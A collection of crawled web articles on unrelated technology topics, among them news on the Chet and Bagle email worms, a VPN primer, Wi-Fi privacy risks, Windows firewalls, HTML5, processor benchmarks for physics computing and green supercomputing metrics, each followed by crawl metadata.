virus was able to recover from its code error and continue running," said Hyppönen, adding that systems running the Windows 98 operating system and containing very long names in the Windows address book are particularly vulnerable to infection by Chet. Makers of leading antivirus software rushed to post new virus definitions protecting against the Chet worm, despite the low risk posed by the worm.
<urn:uuid:bc480a21-5759-4787-a680-ab7dff1f7dcd>
CC-MAIN-2017-04
http://www.computerweekly.com/news/2240047459/Cyber-attacks-fail-to-materialise-as-just-one-9-11-e-mail-worm-emerges
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279248.16/warc/CC-MAIN-20170116095119-00440-ip-10-171-10-70.ec2.internal.warc.gz
en
0.948086
430
2.609375
3
A VPN (virtual private network) offers network connection possibility over an extensive physical distance (remoteness). But you need to know that it can work over both on private networks and public networks (Internet). VPN in simple words make possible for clients or whole LAN-s on other side of the internet to connect into main LAN pesmises and have the “technical impression” that they are localy connected to this site. This includes gaining the local IP address from local DHCP pool, possibility to use all the LAN resources that are defined by the administrator etc. Features shows that the VPN is a type of WAN (wide area network). The purpose of its use in network is: file sharing, video conferencing and facilitating from other similar network services. Though, such services are available already in other alternative mechanisms and technologies, but use of a VPN is made for getting more efficiency of available remote resources, sharing data and better communicating. Most of all, this technology can be implemented in relatively a low cost. Technologies working at the back of VPN A number of network protocols like: PPTP, L2TP, IPsec and SOCKS can be employed in the mechanism of a VPN. The presence of such protocols in the VPN is necessary to carry out the processes of authentication (verification of users) and encryption (to hide sensitive data from the other online public). With the help of tunneling, a VPN can use existing hardware infrastructure on the Internet or intranet. Three different modes of VPN are possible for the following purposes: remote client’s connections over internet, LAN-to-LAN internetworks and for restricted access inside an intranet. VPNs for distant Connectivity over the Internet To increase the mobility of any organization’s workers and to be connected to the company’s networks, a VPN deployment can be a good solution. This device can be employed to handle such circumstances of distance and in order to get protected access to those offices of organization, connected over the Internet. But according to the client/server environment, a client (remote user) is required to log on first to his/her ISP (internet service provider) in this process of getting access to company network. Then company’s VPN server connection is required. Once connection is established between the remote client and server, the communication process will begin soon after this with the internal company systems over the Internet in the same way as a local host can do. Cisco VPN client can be employed for decidedly protected connectivity. And with these devices, encrypted tunneling is established for the remote employees. VPN Extended network It is the quality of a virtual private network to link together two networks for remote access. Moreover, in such cases of operation, the united remote network (combination of two remote networks) can further be linked to another company’s network. This kind of networking structure (extended network) is possible with a VPN server plus this VPN server’s connection. After reviewing the payback that is attached with a VPN networking, downloading Cisco VPN client can be the desire of any organization. But certain system requirements should be fulfilled in order to get benefits from such networks like: - Windows 98 or newer MS operating system, Mac OS X, Linux OS or Solaris Unix OS - VPN (Cisco) client must be compatible with the VPN (Cisco) servers: VPN 3000 series concentrator 3.0 software or later and IOS Software 12.2(8)T or later etc - PPTP, L2TP/IPsec, L2TP or any other VPN tunneling protocol
<urn:uuid:b83aa06d-8c64-48d6-aceb-c452c35a0b16>
CC-MAIN-2017-04
https://howdoesinternetwork.com/2011/vpn
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281162.88/warc/CC-MAIN-20170116095121-00072-ip-10-171-10-70.ec2.internal.warc.gz
en
0.90522
744
3.203125
3
The global distributed computing system known as the Worldwide LHC Computing Grid (WLCG) brings together resources from more than 150 computing centers in nearly 40 countries. Its mission is to store, distribute and analyze the 25 petabytes of data generated each year by the Large Hadron Collider (LHC), based out of the European Laboratory for Particle Physics (CERN) in Geneva, Switzerland. Projects of this magnitude require significantly more computational resources than can be delivered by one facility, hence the need for a multi-organizational, international grid computing system. This infrastructure supports the science that makes discoveries like the Higgs boson possible. Even more capacity will be required going forward. It is predicted that datasets must increase by 2-3 orders of magnitude to realize the full potential of this scientific instrument. Keeping LHC computing relevant in the coming years will require significant advances on the hardware side. Starting around 2005, processors began hitting their scaling limits, owing mostly to their tremendous power demand. This challenge has driven interest in new processor architectures, other than general purpose x86-64 processors. This situation has inspired an international team of distinguished scientists to examine the viability of the ARM processor and the Intel Xeon Phi coprocessor for scientific computing. They’ve written a paper describing their experience porting software to these processors and running benchmarks using real physics applications. Their goal is to assess the potential of these processors to be utilized for production physics processing. For the ARM investigation, the test setup included two low-cost development boards, the ODROID-U2 and the ODROID-XU+E, each sporting eMMC and microSD slots, multiple USB ports and 10/100Mbps Ethernet with an RJ-45 port. Each uses a 5V DC power adaptor. The authors write that “the processor on the U2 board is an Exynos 4412 Prime, a System-on-Chip (SoC) produced by Samsung for use in mobile devices. It is a quad-core Cortex A9 ARMv7 processor operating at 1.7GHz with 2GB of LP-DDR2 memory. The processor also contains an ARM Mali-400 quad-core GPU accelerator, although that was not used for the work described in this paper.” They continue: “The XU+E board has a more recent Exynos 5410 processor, with 4 Cortex-A15 cores at 1.6GHz and 4 Cortex-A7 cores at 1.2GHz, in ARM’s big.LITTLE configuration, with 2GB of LDDR3 memory, as well as a PowerVR SGX544MP3 GPU (also not used in this work).” For the Phi investigations, the team created a basic HEP software development environment to support application and benchmark tests which can run directly on the Phi card. The setup employed a Xeon Phi 7110P card attached to an Intel Xeon box with 32 logical cores. The paper delves further into the hardware and software specifics for each test environment as well as the various challenges and limitations that presented. There is also a discussion of experimental results and general tools support. The authors make the point that “when comparing and optimizing for various architectures, understanding the performance obtained in detail is as important as obtaining overall benchmark numbers.” As could be predicted, single core performance is much lower for ARMv7 processor than traditional x86 processors, but the performance per watt is much improved for the ARM chips. The authors conclude “the potential for use in scientific (general purpose) computing is clear.” They also report “successful ports of both the IgProf profiler and the DMTCP checkpointing package to ARMv7.” Despite these positive initial tests, more work is needed before there is a clear answer on the benefits of these alternative architectures for HEP computing. The paper describing this research has been submitted to proceedings of the 20th International Conference on Computing in High Energy and Nuclear Physics (CHEP13), Amsterdam.
<urn:uuid:6653bf30-04d5-4649-b491-89e314a5d265>
CC-MAIN-2017-04
https://www.hpcwire.com/2013/11/11/alternatives-x86-physics-processing/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279379.41/warc/CC-MAIN-20170116095119-00284-ip-10-171-10-70.ec2.internal.warc.gz
en
0.923015
829
3.109375
3
NEWPORT BEACH, CA--(Marketwired - Mar 11, 2014) - The depths of the sea and the farthest reaches of outer space have something in common: They're both extreme environments. This has led scientists to value the benefits of underwater training for astronauts. Until now, however, access to an appropriate undersea environment has been limited, at best. That's all about to change. As part of a lecture series on ocean-related subjects, NASA engineer Bill Todd will share the story of the new research vessel, SeaOrbiter, currently under construction. He will present exciting information on this topic in two lectures titled "Origins of SeaOrbiter" at the ExplorOcean headquarters in Newport Beach on Thursday, March 27 at 4 and 7 p.m. The public is invited to attend. Todd, who specializes in astronaut training systems, is set to discuss SeaOrbiter's unusual origin and significant value to scientific exploration. In an unusual move for the scientific community, French researchers sourced crowd-funding to build the vessel, with missions planned for the Mediterranean and Atlantic. Chief among its benefits, the ship will offer marine biologists long-term access to the world's oceans as well as host astronauts-in-training. According to the SeaOrbiter website, the vessel will work as "a space simulator which accommodates astronauts in a pressurized area. Living conditions in this pressurized habitat are similar to the conditions found in space." For astronauts and aquanauts, SeaOrbiter continues the legacy of Jules Verne, Jacques Piccard and Jacques-Yves Cousteau. Todd's lecture is part of a series offered by the nonprofit organization, ExplorOcean, America's premiere ocean literacy center. ExplorOcean's monthly lecture series is free to members and costs $15 per talk for non-members. The series runs each month through May and will feature guest speakers including Dr. Kevin Hand of the Deep Sea Challenger Expedition and Dr. Ana Širović, marine bioacoustician at the Scripps Institution of Oceanography. The series is offered as part of ExplorOcean's mission to inspire, educate and engage the explorer within. All lectures will take place at 600 East Bay Ave., Newport Beach, California. ABOUT EXPLOROCEAN: ExplorOcean, America's premiere ocean literacy center, offers a world-class ocean literacy platform and cultural destination where visitors can immerse themselves in interactive exhibitions devised to develop the curious explorer within. ExplorOcean's high quality programs which are grounded in the seven principles of ocean literacy and in STEM content include single day camps, multi-day camps, classes, monthly lectures and an impressive underwater robotics program developed by the director of education, Dr. Wendy Marshall. Headquartered on the Balboa Peninsula between the sparkling Pacific Ocean and the bustling Newport Harbor, the center's nearly two-acre location is the perfect place for people of all ages to learn about the seven seas. For more information about ExplorOcean, please visit www.ExplorOcean.org.
<urn:uuid:6c9978c3-ea41-4041-ae5d-cac1221e63a7>
CC-MAIN-2017-04
http://www.marketwired.com/press-release/explorocean-presents-mastering-the-sea-space-connection-1887751.htm
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280239.54/warc/CC-MAIN-20170116095120-00192-ip-10-171-10-70.ec2.internal.warc.gz
en
0.93435
626
2.78125
3
Most attacks these days are financially motivated, which means cybercriminals are trying to get at either your data or your computer’s processing power to make money by spewing spam on your behalf or by stealing your identity. They're after the names and numbers in your address book and want to access your social networking sites and steal your personal data (social security or credit card numbers, bank account information, etc). What’s More Valuable, Financial Info or Login Details? You might be surprised to know your social networking login details can often be worth more to cybercriminals than your financial information, because there are many protections for consumers against financial fraud but next to none for online accounts like email and social networking. Your social information gives hackers access to your friends on those networks, who then become susceptible to cybercriminal attacks as well. Need an example? Think of your financial information as a car dealership and your social networking details as a discount store. The discount store carries a ton of items sold for little profit but they sell products all the time, while the car dealership sells fewer items at a lower frequency but a much greater profit. Most cyberattackers work more like a discount store than a car dealership. Financial data is only worth a few bucks for each account, and social networking data isn’t worth a whole lot more. But criminals work to gather enough low-ticket pieces of information to sell in bulk to rack up a big payday. High-ticket items like corporate or government secrets take a lot more skill to get, because they’re usually much better protected. However, that doesn’t mean you shouldn’t protect your financial data. Both types of information are valuable to cybercriminals, but many focus the bulk of their efforts on the discount store because it contains lucrative low-hanging fruit that hackers of all abilities are all-too-eager to pick. How Cybercriminals Attack You There are two main ways cybercriminals can attack you: the first is by luring you into using malware to open up your system to them, and the second is by hacking into your accounts or computer directly. Thankfully, there are ways to protect your machine against these attacks. Some methods are effective against both types of attack, while others are more specialized tools. The most fundamental rule of data security is that no one technology holds the key to protecting everything. It’s important to have multiple layers to protect yourself so the weaknesses of one technology are covered by the strengths of the others. By using a suite of security tools, you can best protect yourself against whatever attacks cybercriminals will throw your way. Let’s go over the different layers of security and paint a scenario where your computer is a castle built to protect your precious treasure (your data) from dragons and pillagers (hackers and cybercriminals). The following are multiple safeguards to ensure the treasure inside your castle stays secure. Firewalls: The Gatekeeper of Network Traffic Firewalls like Intego Net Barrier 2013 are like the keepers of the castle gates. They allow you to permit or deny things that go in or out of your machine. A firewall asks you whether to allow unknown applications to connect out from your computer and unknown recipients to connect in (or cross the moat and enter the castle). And it will block or permit files or users it has seen before, that you have specified may pass into or out of your machine. For instance, if you have someone you would like to allow to share your files, you can accept their incoming connection while still keeping out strangers. Or if you’re surfing on a compromised website and it surreptitiously downloads a brand new piece of malware on your machine, it can stop that malware in its tracks before it can send your valuable data back out to the cybercriminal. Your firewall can raise or lower the drawbridge accordingly to make sure that only trusted visitors are allowed inside your castle. Anti-Virus: The Security Inside Your Castle Most people are familiar with anti-virus software—it’s the most popular way to protect against malware attacks, and it’s an essential tool to get your system back to normal if you are affected by malware. Intego Virus Barrier 2013 is our anti-malware tool that does both these jobs. Virus Barrier is the equivalent of the guards within your castle walls. It has both an on-demand and on-access scanner so you can choose whether to scan quickly or thoroughly, depending on your needs. It’s a good idea to keep your on-access scanner going at all times so it can scan files as you access them. That way, any malware that you come across will be detected before it can run and do damage to your system or steal your data. Think of an on-demand scan as the guards who work in your castle on a regular basis, tasked with protecting your treasure from intruders. If you were planning a special feast or celebration and instructed your guards to check the dining hall to make sure it’s safe, that’s the equivalent of an on-demand scan. You’d want to schedule it to run once in a while as an extra measure of assurance or if you suspect something fishy is going on with your machine. Automatic updates make it simple to keep your machine continuously updated against all the latest threats (like showing your guards “Wanted” posters of new thieves and criminals so they know who to look out for). All in all, Virus Barrier is designed to be a method of protection against code that seeks to do you harm, that you can set up and rely on without giving it too much thought. Data Scrubbing: A Map That Locates Your Hidden Treasure One of the trickiest things about protecting your valuable data is being aware of where exactly it resides on your machine. Do you know the exact whereabouts of all the treasure in your castle? Some apps and actions can store sensitive data all over the place, far away from where you would ever think to look. Cybercriminals know this and don’t limit their searches to the obvious locations. Intego Identity Scrubber identifies exactly where specific sensitive information is on your computer so you can better protect your data in the event someone does manage to cross the moat and get past the guards. Running Identity Scrubber will let you know where information such as credit card numbers, social security or driver license numbers, bank account information, passwords, telephone numbers, and any custom data resides so you can better protect it with encryption or choose to delete it. This way, cybercriminals will have a much harder time grabbing information that might be useful for identity theft. Working Together to Create Layers of Security When combined, all these tools make your machine a less profitable target for cybercriminals. With Virus Barrier and Net Barrier, your machine is less likely to be breached in the first place. And if they’re still somehow about to get in, Identity Scrubber will help you keep cybercriminals’ efforts from being worthwhile. Each of these products is offered in both Intego Mac Internet Security Premium and Intego Mac Premium Bundle to make sure your castle and its treasure are protected in multiple effective ways. In a world where too few people take security seriously, you don’t need to have your system so locked down that it’s unusable, or to have a degree in computer science to understand how to keep yourself safe. You can have a simple, layered security system that doesn’t bog you down.
<urn:uuid:ec1e9c73-c7d3-4a6e-9727-08d9be93e80d>
CC-MAIN-2017-04
https://www.intego.com/mac-security-blog/how-a-cyber-criminal-steals-information-off-your-computer/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280835.60/warc/CC-MAIN-20170116095120-00008-ip-10-171-10-70.ec2.internal.warc.gz
en
0.940115
1,563
2.921875
3
Google Brings Lens Blur to Mobile Phone Cameras It's been just about impossible to artistically create a blurry foreground or background in a photo taken with a mobile phone or tablet camera because the small lenses don't display "depth of field." "One of the biggest advantages of SLR cameras over camera phones is the ability to achieve shallow depth of field and bokeh effects," wrote Carlos Hernandez, a Google software engineer, in an April 16 post on the Google Research Blog. "Shallow depth of field makes the object of interest 'pop' by bringing the foreground into focus and de-emphasizing the background. Achieving this optical effect has traditionally required a big lens and aperture, and therefore hasn't been possible using the camera on your mobile phone or tablet." With Lens Blur, which is a new mode in the Google Camera app, users can take a photo with a shallow depth of field using an Android phone or tablet and then change the point or level of focus after the photo is taken, wrote Hernandez. "You can choose to make any object come into focus simply by tapping on it in the image. By changing the depth-of-field slider, you can simulate different aperture sizes, to achieve bokeh effects, ranging from subtle to surreal (e.g., tilt-shift). The new image is rendered instantly, allowing you to see your changes in real time." Lens Blur achieves the effect using algorithms that simulate a larger lens and aperture, he wrote. "Instead of capturing a single photo, you move the camera in an upward sweep to capture a whole series of frames. From these photos, Lens Blur uses computer vision algorithms to create a 3D model of the world, estimating the depth (distance) to every point in the scene." After processing the information, the app re-renders the photo, "blurring pixels by differing amounts, depending on the pixel's depth, aperture and location relative to the focal plane," he wrote. "The algorithms used to create the 3D photo run entirely on the mobile device, and are closely related to the computer vision algorithms used in 3D mapping features like Google Maps Photo Tours and Google Earth." Google Camera works on phones and tablets running Android 4.4+ KitKat. Google often creates new effects and features for digital photographers. In December 2013, Google added the ability for users to include some flashy and decorative twinkles and snow to their online holiday photographs.
<urn:uuid:1082d32a-686d-4e23-8a8d-5528f9b1ae11>
CC-MAIN-2017-04
http://www.eweek.com/blogs/upfront/google-brings-lens-blur-to-mobile-phone-cameras.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280668.34/warc/CC-MAIN-20170116095120-00522-ip-10-171-10-70.ec2.internal.warc.gz
en
0.91414
503
2.75
3
Bagle, a new Internet Worm, Makes Its Presence Felt 19 Jan 2004 Kaspersky Lab, a leading information security software developer is warning users about I-Worm.Bagle, a new Internet worm detected in the wild. The worm spreads via email with a random sender address. Kaspersky Lab has received reports of infections from around the world; Bagle is causing a significant outbreak. The worm is a Windows EXE file about 15 KB in size attached to emails with random sender addresses. The subject, 'Hi', body, 'Test =)' and signature 'Test, yep' are constant, whereas the name of the attachment is random. Once the worm is launched, it copies itself into the Windows directory and attempts to download and launch Mitglieder, a Trojan proxy server, on the infected machine. This proxy server allows the 'master' to use the infected machine as a platform to send more copies of the malicious code. Currently, all links to Internet sources for downloading Mitglieder are deleted. Thus, I-Worm.Bagle cannot use this technology to increase propagation speed. As a result, at this time, I-Worm.Bagle is using a technique standard for Trojan programs. Bagle scans the file system on infected machines for files with extensions wab, txt, htm and r1. The worm then sends copies of itself to all email addresses that it uncovers, using a built in SMTP server. Kaspersky® Anti-Virus databases have already been updated with protection against Bagle
<urn:uuid:650fa8a2-ee32-4286-ae79-e85888c7eb99>
CC-MAIN-2017-04
http://www.kaspersky.com/au/about/news/virus/2004/Bagle_a_new_Internet_Worm_Makes_Its_Presence_Felt
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281263.12/warc/CC-MAIN-20170116095121-00338-ip-10-171-10-70.ec2.internal.warc.gz
en
0.862757
325
2.71875
3
I would be easy to underestimate the importance of a good firewall in protecting your computer when it is connected to the Internet. Studies have found that a computer could be affected by a trojan, worm, or network attack in a matter of a few minutes if it did not have a firewall installed. Windows XP has a built-in firewall that is enabled by default. The Service Pack 1 version of the firewall gave fairly good protection against attack but the Service Pack 2 version was much improved. If you are running Windows XP you should update your system to Service Pack 2 or more preferably Service Pack 3 to secure your data. Windows Vista included an updated security model for Internet communication. As new Vista network connections are created—wireless, dialup, VPN– each connection must be classified as a Public, Private or Domain network location. A network location designation changes networking and firewall settings to reflect the possible threats on a network. A network at a public location such as a restaurant, hotel or airport poses the greatest risk and should be designated as a Public network. Windows Vista launches a dialog window whenever a new connection is established and prompts the user to choose a location. Windows Vista allows fine tuning of Network location firewall settings by using the Windows Firewall with Advanced Security snap-in. The Advanced firewall includes inbound and outbound firewall rules that can precisely control what traffic is allowed through the firewall. The rules can apply to one, two or all of the network locations. Windows 7 builds on the firewall capabilities introduces by Windows Vista with new features for the Standard Firewall. The Windows 7 Standard Firewall allows enabling or disabling the firewall and the setting of notifications on a per-location basis. The Standard Firewall also permits the granting of inbound exceptions on individual network locations, a feature previously only available on the Advanced Firewall. Managing the Standard Firewall is easier on Windows 7 than on any previous version of Windows. Windows 7 also includes Internet Explorer 8 which and run in Protected Mode, a Phishing filter and User Account Control, making it the safest Windows OS yet.
<urn:uuid:d2f6e159-818c-490f-b5b1-8a8e91e423b9>
CC-MAIN-2017-04
http://blog.globalknowledge.com/2010/02/09/network-locations-and-the-windows-7-firewall/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560284376.37/warc/CC-MAIN-20170116095124-00154-ip-10-171-10-70.ec2.internal.warc.gz
en
0.907487
416
2.59375
3
Back in 1970, well before the eating of raw fish became so popular among global gourmands, bluefin tuna, the fish that becomes the delectable Maguro sushi and sashimi on our plates, sold for about five cents a pound. Last year, in a Tokyo fish market one Bluefin tuna sold for nearly three quarters of a million dollars or $1,238 per pound, reflecting in dramatic form the worldwide popularity of the fish. In Japan there has been some discussion as to whether the nation's love affair with Maguro is pushing the bluefin tuna to extinction. After all, Japan consumes about 80% of the world's annual bluefin tuna catch. Its imports of the prized fish soared from 340 tons in 1970 to more than 36,000 tons in 2005, on top of the domestic catch of more than 15,000 tons. While the fish is not on the U.S.'s endangered species list, it is widely thought to be massively overfished, through legal and illegal means, and is considered "a species of concern" by the National Oceanic and Atmospheric Administration. However, the National Oceanic Atmospheric Administration (NOAA) does impose quotas on how many bluefin can be caught. By now, you might have guessed that big data is coming to the rescue – and you'd be right. Modeling big data sets about bluefin breeding habits and migration patterns could well save the bluefin population and an epicurean's Maguro. In that effort, scientists and fishing industry experts are mining NOAA's Comprehensive Large Array-data Stewardship System (CLASS). It began in 2005 as a project to “provide one-stop shopping and access" to its myriad of massive environmental data sets. Currently, CLASS stores more than 20 petabytes of information and adds more 750 gigabytes each week. These data are vital for decision-makers at international governing bodies to dictate if, how, and when changes are made to fishing limits or even bans on bluefin tuna. As the Environmental Group at the Pew Charitable Trust put it: "These assessments use historical catch data, scientific studies, and mathematical models to simulate and track a population as fish are produced, grow, reproduce, and die. They also allow scientists to predict how various management options will affect bluefin tuna in the future." Without big data, our understanding of the bluefin tuna's future would be dim. But with it, we may sustain the species in the ocean while continuing to savor it on our plates. Related reading: Invent new possibilities with HANA, SAP's game-changing in-memory software SAP Sybase IQ Database 15.4 provides advanced analytic techniques to unlock critical business insights from Big Data SAP Sybase Adaptive Server Enterprise is a high-performance RDBMS for mission-critical, data-intensive environments. It ensures highest operational efficiency and throughput on a broad range of platforms. SAP SQL Anywhere is a comprehensive suite of solutions that provides data management, synchronization and data exchange technologies that enable the rapid development and deployment of database-powered applications in remote and mobile environments Overview of SAP database technologies
<urn:uuid:0c595a1c-9854-4647-80ee-04f996cc46ee>
CC-MAIN-2017-04
http://www.itworld.com/article/2721029/it-management/big-data-may-ensure-sustainable-sushi.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280723.5/warc/CC-MAIN-20170116095120-00366-ip-10-171-10-70.ec2.internal.warc.gz
en
0.922196
636
3.34375
3
July 10 — Scientists from the National Renewable Energy Laboratory (NREL) are using the National Science Foundation-supported Stampede supercomputer to improve biofuel production by determining how certain enzymes break down cellulose (plant cell walls). In a paper published in the Proceedings of the National Academy of Sciences in January 2014, they describe a newly-discovered, naturally-occurring enzyme modeled with Stampede that could significantly speed up the process by which cellulose is decomposed. The enzyme, called lytic polysaccharide monooxygenase or LPMO, represents an important, unique discovery because of its prevalence in nature, and its potential importance to cost-effective biomass deconstruction. Using Stampede, the researchers examined two ways that the fungal enzymes catalyze reactions. The simulations suggest that the binding of copper and oxygen by the enzymes is critical to its function. The group is also using Stampede to design chemical catalysts for high-temperature deoxygenation chemistry, which is important to convert biomass to fuels. Said NREL Senior Engineer Gregg Beckham: “Stampede has been an absolutely essential resource for our group to examine biological and chemical catalysts important for the production of renewable transportation fuels from lignocellulosic [plant-based] biomass.”
<urn:uuid:f98eefb2-16d1-4b81-9030-819ab019939b>
CC-MAIN-2017-04
https://www.hpcwire.com/off-the-wire/nrel-researchers-utilizing-nsf-supported-stampede-supercomputer/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280774.51/warc/CC-MAIN-20170116095120-00477-ip-10-171-10-70.ec2.internal.warc.gz
en
0.933398
269
3.15625
3
Forwarded from: "eric wolbrom, CISSP" <ericat_private> http://seattletimes.nwsource.com/html/businesstechnology/134462403_btboston2=7.html Monday, May 27, 2002, 12:00 a.m. Pacific By Simson L. Garfinkel Special to The Seattle Times If you have one of those fancy new wireless Wi-Fi or 802.11(b) cards in your laptop or handheld computer, you probably know about the increasing number of "Wi-Fi hot spots" where you can get wireless Internet access - often without paying. What you may not know, experts warn, is that these hot spots can also use your wireless card to track your movements as you walk around. Meanwhile, other people using the same hot spots can covertly monitor all of the information that you send over the air. "Your average person does not know that they are transmitting any sort of serial number or identification code," says Dana Spiegel, a volunteer with NYC Wireless. Yet every wireless card is created with a unique serial number called a "MAC address." This number, which is transmitted constantly whenever the wireless card is in use, can be used to track a person's movements as he or she carries a wireless-equipped laptop or personal digital assistant (PDA) with them throughout a city or within an office. Although there are no reports of businesses or individuals covertly tracking Wi-Fi users by their MAC addresses, Newbury Networks, a Massachusetts company, has developed a product that uses this capability to create a system for tracking users of handheld computers as they walk around museums and businesses. The system triangulates Wi-Fi users using their MAC address and their wireless signal, says Chuck Conley, director of marketing for the company. Museums can use it to display Web pages or maps on a handheld computer as a person moves from exhibit to exhibit. "It's accurate to within three meters," Conley says. The MAC address plays a vital role in wireless networks: Transmitted with every packet of information sent through the air, the MAC address specifies the radio that is sending the packet and the intended recipient. That's important because, unlike a wired network, every packet sent through the air might potentially be received by dozens, even hundreds, of computers. The network uses the MAC address to make sure that information is received only by the intended recipient. But there is nothing in principle that prevents one wireless radio from listening to packets that are intended for another. And this, experts say, is the cause of a second serious privacy concern with wireless networks: It is easy to eavesdrop on other people's communications, especially at open network access points that do not use encryption. "A lot of people are using these for home and business networks without realizing the distance with which the signal can be intercepted," says Avi Rubin, a researcher at AT&T Laboratories who specializes in wireless-security issues. Using special antennas, it is possible to eavesdrop upon a Wi-Fi signal that is originating thousands of feet away. Even without such equipment, Wi-Fi signals can be intercepted by other people in adjacent offices or across the street. Although Wi-Fi equipment on the market includes an encryption system called WEP (short for Wireline Equivalent Privacy), Rubin's research has shown that errors in the way the encryption was implemented cause it to be largely ineffective. Many people "believe that if they turn on the security features that come with it, like the encryption, that they are safe," Rubin says. But in fact, most networks using WEP can be cracked in a few hours. What's more, WEP is not used at Wi-Fi "hot spots." If it were, people passing through wouldn't be able to access the networks. In New York, NYC Wireless has tried to tackle the privacy issue by advising people to use their own encryption. For example, Web pages that are downloaded using the https: instead of the http: protocol are safe from eavesdropping because they are encrypted with the SSL protocol. For individual users on a public network, it's best to work under the assumption that the network is completely insecure and perhaps even "hostile," says Spiegel. "That means using only secure channels for your communications, which is something that we always encourage our users to do." Yet another privacy problem with the Wi-Fi system is that sophisticated users can change their MAC addresses using special tools. A person interested in conducting a crime on the Internet could sniff your MAC address when you were at a public Internet cafe and then set a wireless card to use your MAC address after you left. "For the average Joe in the street, the likelihood of him being monitored by another average Joe in the street is not that great," says Richard Powers, editorial director of the Computer Security Institute. But many people who consider themselves to be "average" really aren't because of the information that they have access to through their work. Many people, Powers says, treat the information at work as confidential, but then they will bring it home and access it in a less secure environment. One of the most famous examples of this involves former CIA Director John Deutch, who took classified information out of the CIA and accessed it on an unsecured computer in his Massachusetts home. Deutch's actions were pardoned by President Clinton on the president's last day in office. "Deutch is not a bad guy, all things considered, but he made an incredible blunder," says Powers. Rubin, the AT&T scientist, uses a wireless network in his house, but "I do it knowing that it is available to somebody outside the house. So for very important business transactions, I tunnel through a machine back at work." As for buying things over the Web, he says, "I make sure that I'm using SSL." Simson L. Garfinkel is a technology journalist and author who specializes in computer security and privacy. - ISN is currently hosted by Attrition.org To unsubscribe email majordomoat_private with 'unsubscribe isn' in the BODY of the mail. This archive was generated by hypermail 2b30 : Mon Jun 03 2002 - 06:26:11 PDT
<urn:uuid:2ad6fca7-dd95-41b7-9cdd-4f3677728e37>
CC-MAIN-2017-04
http://lists.jammed.com/ISN/2002/06/0001.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281084.84/warc/CC-MAIN-20170116095121-00229-ip-10-171-10-70.ec2.internal.warc.gz
en
0.967798
1,272
2.71875
3
HTML 5: What's new about it? Precise elements and application programming interfaces - By Joab Jackson - Aug 28, 2009 HTML 5 will maintain backward compatibility with all former versions, while cleaning up some ambiguities of the previous version of the markup language. It will also offer a number of new elements, or markup symbols, that can more precisely define the elements of a Web page. And for the first time, HTML will come with a set of application programming interfaces (API) that assist developers in setting up Web applications. In this report: The long road to HTML 5 Here are some highlights: - Article and Aside: Elements for marking the main body of text for a page and for additional sidebars of text, respectively. - Audio and Video: Elements for marking video and audio files. With these elements in place, application authors can write their own interfaces or use a browser's built-in functions for actions such as fast-forwarding or rewinding. - Canvas: An element that can used for rendering dynamic bitmap graphics on the fly, such as charts or games. - Details: An element that could be put in place to allow users to obtain additional information upon demand. - Dialog: An element that defines written dialog on a Web page. - Header and Footer: Elements for rendering headers and footers to a Web page. - Meter: An element that can be used to render some form of measurement. - Section: This element can be used to define different sections within a Web page. - Nav: An element for aiding in navigation around a site. - Progress: An element that can be used to represent completion of a task, such as downloading file. - Time: An element to represent time and/or a date. - An API for allowing Web applications to run off-line. - An API for crossdocument messaging, which allows two parts of a Web page that come from different sources to communicate information. - An API for dragging and dropping content across a Web page. - An API for drawing 2-D images for the canvas tag. - An API for playing audio and video, used in conjunction with the audio and video tags. Source: "HTML 5 differences from HTML 4" (http://dev.w3.org/html5/html4-differences/ ) and HTML 5 Draft (http://dev.w3.org/html5/spec/Overview.html Joab Jackson is the senior technology editor for Government Computer News.
<urn:uuid:a5d092a2-14b7-49a8-8389-fc882adbda44>
CC-MAIN-2017-04
https://gcn.com/articles/2009/08/31/html-5-sidebar-new-elements.aspx
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560285337.76/warc/CC-MAIN-20170116095125-00531-ip-10-171-10-70.ec2.internal.warc.gz
en
0.823421
531
3.09375
3
Supercomputing vendor SiCortex has long trumpeted the power-, cooling-, and space-friendliness of its HPC gear. Over time it’s added those advantages together to create a picture of eco-friendly HPC, and it’s reinforced the message in special events where it uses pedal power from teams of bicyclists to power its boxes. This week the company is introducing a new metric, the Green Computing Performance Index, that assesses the performance of individual supercomputers based on the ratio of their performance on the HPC Challenge benchmark to power consumption. Although the broader IT community has whipped itself into a foamy eco-green froth over the past two years, the conversation about the ecological impact of computing is still fairly new in HPC. The only major community effort to assess the impact of supercomputing on the ecosystem thus far has been the Green500 List, which didn’t get started until November 2007. The Green500, curated by Wu-chun Feng and Kirk W. Cameron, uses performance figures from the TOP500 List and divides them by the total power draw of the machine. Power is either peak (indicated in gray on the Green500 Web site) or measured according to a methodology described on the Web site. This approach carries with it a significant advantage, namely the TOP500 list itself. The list is well-understood and widely quoted. Most serious HPC organizations submit results to it, and so the Green500 team has been able to build upon the momentum that the TOP500 team has established over many years. However using the TOP500 List as the performance basis also brings along the disadvantage of that list: it uses a sole performance benchmark, the Linpack, which is often observed to be inadequate to characterize a supercomputer’s usefulness on real world problems. The team at SiCortex addressed this shortcoming of the Green500’s approach by adopting the benchmark suite that was developed to address the deficiencies of the Linpack itself: the HPC Challenge Benchmark. The HPCC consists of seven tests, each of which stresses various aspects of a machine’s architecture, including the same floating point performance measure used on the TOP500 list plus additional tests that measure memory bandwidth and interprocessor communication as well as floating point performance in more complex computational kernels. Results from an HPCC run are divided by the power consumed in kilowatts — again, either measured or peak — to yield SiCortex’s proposed index, the Green Computing Performance Index or GCPI. John Goodhue, SiCortex’s CTO and a member of the team doing the thinking on the GCPI, recognizes that there are a variety of ways that individual consumers might need to see this information, and the metric admits three different ways to compute the GCPI. First, one can compute the GCPI on a benchmark-by-benchmark basis. For example, dividing the performance of the Cray XT4 at the ERDC MSRC on the single STREAM triad metric reported at the HPCC Web site by its power 